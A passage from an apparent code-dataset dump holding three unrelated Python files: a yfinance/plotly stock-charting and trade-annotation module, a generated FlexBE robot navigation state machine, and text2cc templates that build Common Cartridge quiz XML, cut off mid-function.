# TODO: Check the value of __debug__ inside of the compiled block!
# According to the documentation, it should follow the optimize flag.
# However, cpython3.5.0a0 behaves the same way as PyPy (__debug__ follows
# -O, -OO flags of the interpreter).
| 2.6875 | 3 |
tickers_graphing_module.py | huangbrandon432/Investing-Trading-Tool | 0 | 5504 |
import yfinance as yf
import matplotlib.pyplot as plt
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import pandas as pd
from IPython.display import Markdown, display
import numpy as np
from datetime import date, timedelta
def plot_and_get_info(ticker, start = None, end = None, ma = 'yes'):
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if start and end:
start_date, end_date = start, end
else:
start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1]
frame = ticker_hist.loc[start_date:end_date]
closing_prices = frame['Close']
volume = frame['Volume']
fig = make_subplots(rows=2, cols=1,
shared_xaxes=True,
vertical_spacing=0.03, row_heights = [0.8, 0.2])
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close'), row = 1, col = 1)
if ma == 'yes':
closing_prices_ma = frame['Close'].rolling(7).mean()
fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = '7D Close Moving Average'), row = 1, col = 1)
fig.add_trace(go.Bar(x = closing_prices.index, y = volume, name = 'Volume'), row=2, col=1)
fig.update_xaxes(rangeslider_visible = True, rangeslider_thickness = 0.1, row=2, col=1)
fig.update_yaxes(title_text="Price", row=1, col=1)
fig.update_layout(title=ticker, height = 600,
xaxis=dict(
rangeselector=dict(
buttons=list([
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
dict(count=1,
label="1m",
step="month",
stepmode="backward"),
dict(count=3,
label="3m",
step="month",
stepmode="backward"),
dict(count=6,
label="6m",
step="month",
stepmode="backward"),
dict(count=1,
label="YTD",
step="year",
stepmode="todate"),
dict(count=1,
label="1y",
step="year",
stepmode="backward"),
dict(step="all")
])
),
type="date"
)
)
fig.show()
start_price, end_price = frame.iloc[0]['Close'], frame.iloc[-1]['Close']
def printmd(string):
display(Markdown(string))
printmd('Given Timeframe:')
printmd("Return: {:.2f}%".format((end_price - start_price)/start_price*100))
try:
ticker_info = ticker_obj.info
print()
printmd('Business Summary: ' + ticker_info['longBusinessSummary'])
market_cap = str(round(ticker_info['marketCap']/1000000000,2)) + 'B'
longname = ticker_info['longName']
sector = ticker_info['sector']
industry = ticker_info['industry']
country = ticker_info['country']
avg10d_vol = str(round(ticker_info['averageDailyVolume10Day']/1000000,2)) + 'M'
most_recent_vol = str(round(ticker_info['volume']/1000000,2)) + 'M'
try:
beta = round(ticker_info['beta'],2)
except:
beta = ticker_info['beta']
try:
ps_trailing_12mo = round(ticker_info['priceToSalesTrailing12Months'],2)
except:
ps_trailing_12mo = ticker_info['priceToSalesTrailing12Months']
try:
forwardpe = round(ticker_info['forwardPE'],2)
except:
forwardpe = ticker_info['forwardPE']
pegratio = ticker_info['pegRatio']
forwardeps = ticker_info['forwardEps']
trailingeps = ticker_info['trailingEps']
shares_outstanding = str(round(ticker_info['sharesOutstanding']/1000000,2)) + 'M'
shares_short = str(round(ticker_info['sharesShort']/1000000,2)) + 'M'
shares_short_perc_outstanding = str(round(ticker_info['sharesPercentSharesOut']*100,2)) + '%'
floatshares = str(round(ticker_info['floatShares']/1000000,2)) + 'M'
try:
short_perc_float = str(round(ticker_info['shortPercentOfFloat']*100,2)) + '%'
except:
short_perc_float = ticker_info['shortPercentOfFloat']
perc_institutions = str(round(ticker_info['heldPercentInstitutions']*100,2)) + '%'
perc_insiders = str(round(ticker_info['heldPercentInsiders']*100,2)) + '%'
stock_info = [market_cap, longname, sector, industry, country, beta, most_recent_vol, avg10d_vol, ps_trailing_12mo, forwardpe, pegratio, forwardeps, trailingeps,
shares_outstanding, perc_institutions, perc_insiders, shares_short, shares_short_perc_outstanding, floatshares, short_perc_float]
stock_info_df = pd.DataFrame(stock_info, index = ['Market Cap', 'Name', 'Sector', 'Industry', 'Country', 'Beta', 'Day Volume (Most recent)',
'Avg 10D Volume', 'P/S Trailing 12mo', 'Forward P/E', 'PEG Ratio', 'Forward EPS',
'Trailing EPS', 'Shares Outstanding', 'Institutions % of Outstanding',
'Insiders % of Outstanding', 'Shares Short (Prev Mo)', 'Short % of Outstanding (Prev Mo)',
'Shares Float', 'Short % of Float (Prev Mo)'], columns = ['Info'])
print()
display(stock_info_df)
except:
pass
def compare_charts(tickers = [], start = None, end = None, ma = 'yes'):
if len(tickers) <= 1:
raise Exception("Please enter at least two tickers to compare")
def normalize_data(column):
min = column.min()
max = column.max()
# time series normalization
# y will be a column in a dataframe
y = (column - min) / (max - min)
return y
def printmd(string):
display(Markdown(string))
start_end_prices = {}
closing_90_days = []
fig = go.Figure()
for ticker in tickers:
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if start and end:
start_date, end_date = start, end
else:
start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1]
frame = ticker_hist.loc[start_date:end_date].copy()
frame['Norm Close'] = normalize_data(frame['Close'])
closing_prices = frame['Norm Close']
start_end_prices[ticker] = {'start_price': frame.iloc[0]['Close'], 'end_price': frame.iloc[-1]['Close']}
closing_90_days.append(closing_prices.iloc[-90:].to_frame().rename(columns = {'Norm Close': ticker}))
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = ticker + ' Norm Close'))
if ma == 'yes':
closing_prices_ma = frame['Norm Close'].rolling(7).mean()
fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = ticker + ' 7D Close Moving Average'))
fig.update_layout(title = ', '.join(tickers) + ' Comparison', yaxis_title = 'Norm Price')
fig.update_layout(height = 600,
xaxis=dict(
rangeselector=dict(
buttons=list([
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
dict(count=1,
label="1m",
step="month",
stepmode="backward"),
dict(count=3,
label="3m",
step="month",
stepmode="backward"),
dict(count=6,
label="6m",
step="month",
stepmode="backward"),
dict(count=1,
label="YTD",
step="year",
stepmode="todate"),
dict(count=1,
label="1y",
step="year",
stepmode="backward"),
dict(step="all")
])
),
rangeslider=dict(
visible=True, thickness = 0.1
),
type="date"
)
)
fig.show()
printmd('Given Timeframe:')
for ticker in tickers:
start_price, end_price = start_end_prices[ticker]['start_price'], start_end_prices[ticker]['end_price']
printmd(ticker + " Return: {:.2f}%".format((end_price - start_price)/start_price*100))
if len(tickers) > 2:
concat_closing_90_days = pd.concat(closing_90_days, axis = 1)
print('\n')
printmd("Last 90 Days Close Pearson Correlation Matrix: ")
display(concat_closing_90_days.corr())
fig2 = px.imshow(concat_closing_90_days.corr(), color_continuous_scale = 'blues', title = 'Last 90 Days Close Pearson Correlation Heatmap',
width = 500, height = 400)
fig2.show()
else:
fig2 = go.Figure()
fig2.add_trace(go.Scatter(x = closing_90_days[0].loc[:, tickers[0]], y = closing_90_days[1].loc[:, tickers[1]], mode = 'markers', name = 'Norm Close'))
fig2.update_layout(title = ', '.join(tickers) + ' Last 90 Days Correlation', xaxis_title = tickers[0], yaxis_title = tickers[1], width = 1000, height = 500)
fig2.show()
printmd("Pearson Correlation: " + str(round(closing_90_days[0].loc[:, tickers[0]].corr(closing_90_days[1].loc[:, tickers[1]]),3)))
print()
def plot_buysell_points(ticker, tradesdf, crypto = 'no'):
trade_history = tradesdf[tradesdf['Symbol'] == ticker].reset_index(drop=True)
if crypto == 'yes':
ticker += '-USD'
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if len(ticker_hist) == 0:
return
start_date = (pd.to_datetime(trade_history.loc[0, 'Date']) - timedelta(150)).strftime("%Y-%m-%d")
today_date = date.today().strftime("%Y-%m-%d")
frame = ticker_hist.loc[start_date:today_date]
closing_prices = frame['Close']
fig = go.Figure()
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close'))
for i in range(len(trade_history)):
trade_date = trade_history.loc[i, 'Date']
price = trade_history.loc[i, 'Avg_Price']
quantity = trade_history.loc[i, 'Quantity']
total = trade_history.loc[i, 'Total']
side = trade_history.loc[i, 'Side']
gain = trade_history.loc[i, 'Gain']
perc_gain = trade_history.loc[i, '% Gain']
if side == 'buy':
fig.add_annotation(x = trade_date, y = price, text = f'BB', showarrow = True, arrowhead = 1,
ax = -0.5, ay = -30, arrowsize = 1.5, align = 'left',
hovertext = f'B, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}')
if side == 'sell':
fig.add_annotation(x = trade_date, y = price, text = f'SS', showarrow = True, arrowhead = 1,
ax = 20, ay = -30, arrowsize = 1.5, align = 'right',
hovertext = f'S, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}, G: {gain}, %G: {perc_gain}')
fig.update_layout(title = ticker, yaxis_title = 'Price')
fig.show()
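# Example usage (not part of the original module): a short sketch of how these
# helpers might be called. The tickers, dates, and the trade-history DataFrame
# columns shown here are assumptions for illustration only.
if __name__ == '__main__':
    # Single-ticker chart with volume, info table, and 7-day moving average
    plot_and_get_info('AAPL', start='2021-01-01', end='2021-06-30', ma='yes')

    # Normalized comparison of several tickers plus a correlation heatmap
    compare_charts(['AAPL', 'MSFT', 'GOOG'], start='2021-01-01', end='2021-06-30')

    # Overlay buy/sell annotations from a trade-history DataFrame
    trades = pd.DataFrame({
        'Symbol': ['AAPL'], 'Date': ['2021-03-01'], 'Side': ['buy'],
        'Avg_Price': [125.0], 'Quantity': [10], 'Total': [1250.0],
        'Gain': [None], '% Gain': [None],
    })
    plot_buysell_points('AAPL', trades)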
| 2.640625 | 3 |
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py | amsks/generic_flexbe_states | 0 | 5505 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from flexbe_states.wait_state import WaitState
from flexbe_navigation_states.turn_right_sm import turn_rightSM
from flexbe_states.subscriber_state import SubscriberState
from flexbe_utility_states.MARCO import Carbonara
from flexbe_navigation_states.turn_left_sm import turn_leftSM
from flexbe_navigation_states.go_straight_sm import go_straightSM
from flexbe_navigation_states.obstacle_avoidance_sm import Obstacle_AvoidanceSM
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Sat Jul 18 2020
@author: TG4
'''
class NavigationSM(Behavior):
'''
Integrated behaviour
'''
def __init__(self):
super(NavigationSM, self).__init__()
self.name = 'Navigation'
# parameters of this behavior
# references to used behaviors
self.add_behavior(turn_rightSM, 'turn_right')
self.add_behavior(turn_leftSM, 'turn_left')
self.add_behavior(go_straightSM, 'go_straight')
self.add_behavior(go_straightSM, 'go_straight_2')
self.add_behavior(go_straightSM, 'go_straight_3')
self.add_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:1683 y:419, x:605 y:337
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:58 y:69
OperatableStateMachine.add('w1',
WaitState(wait_time=1),
transitions={'done': 's1'},
autonomy={'done': Autonomy.Off})
# x:1090 y:488
OperatableStateMachine.add('turn_right',
self.use_behavior(turn_rightSM, 'turn_right'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:55 y:196
OperatableStateMachine.add('s1',
SubscriberState(topic='/darknet_ros/bounding_boxes', blocking=True, clear=False),
transitions={'received': 'carb1', 'unavailable': 'w1'},
autonomy={'received': Autonomy.Off, 'unavailable': Autonomy.Off},
remapping={'message': 'detected'})
# x:286 y:212
OperatableStateMachine.add('carb1',
Carbonara(),
transitions={'none': 'go_straight', 'Obstacle': 'Obstacle_Avoidance', 'Left': 'go_straight_2', 'Right': 'go_straight_3'},
autonomy={'none': Autonomy.Off, 'Obstacle': Autonomy.Off, 'Left': Autonomy.Off, 'Right': Autonomy.Off},
remapping={'input_value': 'detected', 'Distance': 'Distance'})
# x:1180 y:246
OperatableStateMachine.add('w2',
WaitState(wait_time=1),
transitions={'done': 'w5'},
autonomy={'done': Autonomy.Off})
# x:1161 y:64
OperatableStateMachine.add('w5',
WaitState(wait_time=1),
transitions={'done': 'w1'},
autonomy={'done': Autonomy.Off})
# x:958 y:119
OperatableStateMachine.add('turn_left',
self.use_behavior(turn_leftSM, 'turn_left'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:906 y:276
OperatableStateMachine.add('go_straight',
self.use_behavior(go_straightSM, 'go_straight'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:679 y:118
OperatableStateMachine.add('go_straight_2',
self.use_behavior(go_straightSM, 'go_straight_2'),
transitions={'finished': 'turn_left', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:715 y:484
OperatableStateMachine.add('go_straight_3',
self.use_behavior(go_straightSM, 'go_straight_3'),
transitions={'finished': 'turn_right', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:381 y:495
OperatableStateMachine.add('Obstacle_Avoidance',
self.use_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance'),
transitions={'finished': 's1', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
| 1.890625 | 2 |
text2cc/xml_assessment.py | dlehman83/text2cc | 1 | 5506 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021, <NAME>
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion
BEFORE_ITEMS = '''\
<?xml version="1.0" encoding="UTF-8"?>
<questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd">
<assessment ident="{assessment_identifier}" title="{title}">
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_maxattempts</fieldlabel>
<fieldentry>1</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
cc_profile
</fieldlabel>
<fieldentry>
cc.exam.v0p1
</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
qmd_assessmenttype
</fieldlabel>
<fieldentry>
Examination
</fieldentry>
</qtimetadatafield>
</qtimetadata>
<section ident="root_section">
'''
AFTER_ITEMS = '''\
</section>
</assessment>
</questestinterop>
'''
GROUP_START = '''\
<section ident="{ident}" title="{group_title}">
<selection_ordering>
<selection>
<selection_number>{pick}</selection_number>
<selection_extension>
<points_per_item>{points_per_item}</points_per_item>
</selection_extension>
</selection>
</selection_ordering>
'''
GROUP_END = '''\
</section>
'''
TEXT = '''\
<item ident="{ident}" title="{text_title_xml}">
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>text_only_question</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>0</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry></fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
<presentation>
<material>
<mattext texttype="text/html">{text_html_xml}</mattext>
</material>
</presentation>
</item>
'''
START_ITEM = '''\
<item ident="{question_identifier}" title="{question_title}">
'''
END_ITEM = '''\
</item>
'''
ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>{question_type}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>{points_possible}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry>{original_answer_ids}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
'''
ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '')
ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY
ITEM_PRESENTATION_MCTF = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_lid ident="response1" rcardinality="Single">
<render_choice>
{choices}
</render_choice>
</response_lid>
</presentation>
'''
ITEM_PRESENTATION_MCTF_CHOICE = '''\
<response_label ident="{ident}">
<material>
<mattext texttype="text/html">{choice_html_xml}</mattext>
</material>
</response_label>'''
ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple')
ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE
ITEM_PRESENTATION_SHORTANS = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_ESSAY = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_UPLOAD = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
</presentation>
'''
ITEM_PRESENTATION_NUM = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib fibtype="Decimal">
<response_label ident="answer1"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_RESPROCESSING_START = '''\
<resprocessing>
<outcomes>
<decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/>
</outcomes>
'''
ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{answer_xml}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\
<varequal respident="response1">{answer_xml}</varequal>'''
ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\
<varequal respident="response1">{ident}</varequal>'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\
<not>
<varequal respident="response1">{ident}</varequal>
</not>'''
ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY = '''\
<respcondition continue="No">
<conditionvar>
<other/>
</conditionvar>
</respcondition>
'''
ITEM_RESPROCESSING_END = '''\
</resprocessing>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\
<itemfeedback ident="general_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\
<itemfeedback ident="correct_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\
<itemfeedback ident="general_incorrect_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\
<itemfeedback ident="{ident}_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str:
'''
Generate assessment XML from Quiz.
'''
xml = []
xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier,
title=title_xml))
for question_or_delim in quiz.questions_and_delims:
if isinstance(question_or_delim, TextRegion):
xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}',
text_title_xml=question_or_delim.title_xml,
assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}',
text_html_xml=question_or_delim.text_html_xml))
continue
if isinstance(question_or_delim, GroupStart):
xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}',
group_title=question_or_delim.group.title_xml,
pick=question_or_delim.group.pick,
points_per_item=question_or_delim.group.points_per_question))
continue
if isinstance(question_or_delim, GroupEnd):
xml.append(GROUP_END)
continue
if not isinstance(question_or_delim, Question):
raise TypeError
question = question_or_delim
xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}',
question_title=question.title_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices)
elif question.type == 'numerical_question':
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = f'text2qti_numerical_{question.id}'
elif question.type == 'essay_question':
item_metadata = ITEM_METADATA_ESSAY
original_answer_ids = f'text2qti_essay_{question.id}'
elif question.type == 'file_upload_question':
item_metadata = ITEM_METADATA_UPLOAD
original_answer_ids = f'text2qti_upload_{question.id}'
else:
raise ValueError
        # Type change for Schoology Common Cartridge (CC) import
if question.type == 'multiple_choice_question':
typechange = 'cc.multiple_choice.v0p1'
elif question.type == 'true_false_question':
typechange = 'cc.true_false.v0p1'
elif question.type == 'short_answer_question':
typechange = 'cc.fib.v0p1'
elif question.type == 'multiple_answers_question':
typechange = 'cc.multiple_response.v0p1'
elif question.type == 'essay_question':
typechange = 'cc.essay.v0p1'
else:
typechange = question.type
xml.append(item_metadata.format(question_type=typechange,
points_possible=question.points_possible,
original_answer_ids=original_answer_ids,
assessment_question_identifierref=f'text2qti_question_ref_{question.id}'))
if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'):
if question.type in ('true_false_question', 'multiple_choice_question'):
item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE
item_presentation = ITEM_PRESENTATION_MCTF
elif question.type == 'multiple_answers_question':
item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE
item_presentation = ITEM_PRESENTATION_MULTANS
else:
raise ValueError
choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml)
for c in question.choices)
xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices))
elif question.type == 'short_answer_question':
xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml))
elif question.type == 'numerical_question':
xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml))
elif question.type == 'essay_question':
xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml))
elif question.type == 'file_upload_question':
xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml))
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question'):
correct_choice = None
for choice in question.choices:
if choice.correct:
correct_choice = choice
break
if correct_choice is None:
raise TypeError
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
